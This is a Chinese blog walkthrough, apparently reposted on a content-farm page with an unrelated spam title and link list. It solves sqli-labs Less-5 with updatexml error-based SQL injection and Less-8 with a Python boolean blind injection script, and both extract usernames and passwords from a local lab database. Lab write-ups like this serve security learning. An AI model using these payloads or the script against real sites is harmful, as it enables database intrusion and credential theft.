当前位置: 首页 > news >正文

日本有一个做青蛙模型的网站百度今日小说排行榜

news 2025/8/11 5:10:28
日本有一个做青蛙模型的网站,百度今日小说排行榜,关键词优化举例,加强网站党建建设方案sqllabs5:(报错注入) ?id1 回显You are in........... ?id2-1 回显You are in........... ?id1 回显 1 LIMIT 0,1 判断是字符型,闭合。?id1order by 3-- //页面显示正常我们试了4行得出是报错注入 我们先爆库名 http://127.0.0.1/sqli-labs-master/L…

sqllabs5:(报错注入)

?id=1  回显You are in...........
?id=2-1  回显You are in...........
?id=1'  回显'  '1'' LIMIT 0,1  '判断是字符型,'闭合。

?id=1'order by 3--+    //页面显示正常

我们试了4行得出是报错注入

我们先爆库名

http://127.0.0.1/sqli-labs-master/Less-5/?id='and updatexml(1,concat(0x7e,(select database()),0x7e),3)--+

拿下库名:security

爆表名

http://127.0.0.1/sqli-labs-master/Less-5/?id=-1%27%20and%20updatexml(1,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)),1)%20--+

拿下表名

然后爆字段:

http://127.0.0.1/sqli-labs-master/Less-5/?id=-1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security')),1) --+

爆数据:

http://127.0.0.1/sqli-labs-master/Less-5/?id=-1' and updatexml(1,concat(0x7e,(select group_concat(username,0x7e,password) from users)),1) --+

数据不完整,因为updatexml()函数的报错内容不超过32个字符,所以我们还需要对数据进行处理

使用substring()函数对结果字符进行处理

?id=-1' and updatexml(1,concat(0x7e,substring((select group_concat(username,0x7e,password) from users),32,64)),1) --+

之后我们就可以不断改变位置,这样我们就可以得到所有数据,后续的操作不再演示

sqllabs8:布尔盲注

报错注入被注释掉了

联合查询只出现you are in ..........

所以这里我们能看见一真一假(页面特征)

不加'时为真

http://127.0.0.1/sqli-labs-master/Less-8/?id=1

加入'时为假

http://127.0.0.1/sqli-labs-master/Less-8/?id=1'

我们可以用布尔盲注

我们数据库名:

security,s的ascii码是115,我们可以一个一个试一试

http://127.0.0.1/sqli-labs-master/Less-8//?id=1' and ascii(substring((select database()),1,1))=115--+

利用二分法和ASCII码进行渗透:

根据此现象我们写一个python脚本快速进行注入

import time
import requestsurl = 'http://127.0.0.1/sqli-labs-master/Less-8/index.php'def inject_database(url):name = ''for i in range(1, 50):low = 32high = 128mid = (low + high) // 2while low < high:payload = "1' and ascii(substr(database(), %d, 1)) > %d-- " % (i, mid)res = {"id": payload}# start_time = time.time()r = requests.get(url, params=res)# end_time = time.time()if 'You are in...........' in r.text:low = mid + 1else:high = midmid = (low + high) // 2if mid == 32:breakname = name + chr(mid)print(name)inject_database(url)

爆库名;

爆表名:

payload = "1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()), %d, 1)) > %d-- " % (i, mid)

爆列名:

payload = "1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'), %d, 1)) > %d-- " % (i, mid)

爆数据:

payload = "1' and ascii(substr((select group_concat(username,'$',password) from users), %d, 1)) > %d-- " % (i, mid)

http://www.mmbaike.com/news/97425.html

相关文章:

  • 爱ppt网站淘宝关键词优化怎么弄
  • 石家庄p2p网站开发越秀seo搜索引擎优化
  • 网站怎么加载图片做logo网络项目推广平台
  • 如果做自己的网站百度手机助手应用商店下载
  • 国家公安网查网站备案2022年小学生新闻摘抄十条
  • 做电影网站为什么查封不了竞价推广教程
  • 免费做网站百度搜索百度
  • 做网站很烧钱营销推广的工具有哪些
  • 网页开发和网站开发成都网站建设技术支持
  • 网页设计开发招聘合肥网站seo整站优化
  • 金融行业网站建设口碑好的设计培训机构
  • 好的企业型网站模板下载广州专做优化的科技公司
  • 网站建设创意广告词谷歌seo价格
  • 私服网站去哪买空间啊专业的营销团队哪里找
  • 申请账号注册河北电子商务seo
  • 目录 首页 wordpress关键词排名优化易下拉软件
  • 天津市做网站的公司怎么自己做网址
  • python做网站有什么弊端计算机培训机构哪个最好
  • 智能建站系统个人网站网站优化费用报价明细
  • 做房产网站能赚钱吗seo排名点击 seo查询
  • 做俄语网站建设什么是网络营销战略
  • 建筑行业培训seo公司 引擎
  • 英文网站数据库如何建设腾讯朋友圈广告投放价格
  • 广州企业做网站热点新闻最新消息
  • 权重网站建设阳泉seo
  • 网站建设学什么前端培训哪个机构靠谱
  • wordpress手机不兼容seo培训优化
  • 企业门户网站建设与发展趋势网络推销平台有哪些
  • 微网站制作成都网络推广公司
  • 网站测试与发布武汉关键词包年推广